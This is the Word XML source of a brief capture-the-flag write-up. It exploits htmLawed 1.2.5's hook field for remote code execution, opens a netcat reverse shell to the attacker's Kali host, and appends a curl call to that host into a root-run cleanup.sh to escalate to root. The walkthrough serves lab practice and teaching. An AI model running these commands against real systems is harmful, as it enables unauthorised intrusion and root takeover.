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702A2A09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9935FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Law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3ACEF80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57190" w:rsidRPr="00257190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 w:rsidR="00257190" w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap -p- $ip -Pn -sT -v -A --open -T 4 -oN nmap.txt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D9EE653" w:rsidR="00843DCE" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We found htmlawed 1.2.5 page by browsing </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00257190">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://$IP.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> By googling “HTMLAWED 1.2.5 exploit”, we found a potential RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6B9C2" w14:textId="77777777" w:rsidR="00257190" w:rsidRPr="00257190" w:rsidRDefault="00257190" w:rsidP="00257190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enter the command you want to execute at the input, and at the setting, put exec at the hook field then hit process button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30700E1E" w14:textId="77777777" w:rsidR="00257190" w:rsidRDefault="00257190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5B7E17B6" w:rsidR="00843DCE" w:rsidRPr="00257190" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By doing so, we got a 404 response LOL. Checking the browser network tab, we discovered the POST request sent to </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00257190">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://$ip/htmLawedTest.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> where our page is supposed to be </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00257190">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://$ip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> , to ease up the thing, we decide to use burp to intercept the traffic, and correct the POST request.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47CD2D83" w:rsidR="00843DCE" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute nc $kaliIP 80 -e /bin/sh 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6F01CF8A" w:rsidR="00843DCE" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>we notice a cleanup.sh where we have read write permission. By checking the content of the file, it executes bash command to remove /var/log/apache2/error.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="19ADB44B" w:rsidR="00843DCE" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use ls -al to check permission of the directory, we notice it requires root permission. So in this case, we can assume that the script could execute by root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E22E1FC" w14:textId="3230AEAE" w:rsidR="00257190" w:rsidRDefault="00257190" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257190">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo ‘curl http://$kaliIP:8081’ &gt;&gt; cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77163E81" w14:textId="468B594D" w:rsidR="00257190" w:rsidRDefault="00257190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bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D441B" w14:textId="0E543104" w:rsidR="00257190" w:rsidRDefault="00257190" w:rsidP="00843D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and in shell we obtain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F11B4" w14:textId="77777777" w:rsidR="00257190" w:rsidRDefault="00257190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327103FA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1DA9C3BF" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00257190" w:rsidP="0025719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 dir we find the flag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257190"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00757ACB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009935FE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B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$ip./" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://$ip/htmLawedTest.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://$ip.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2026-01-03T17:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>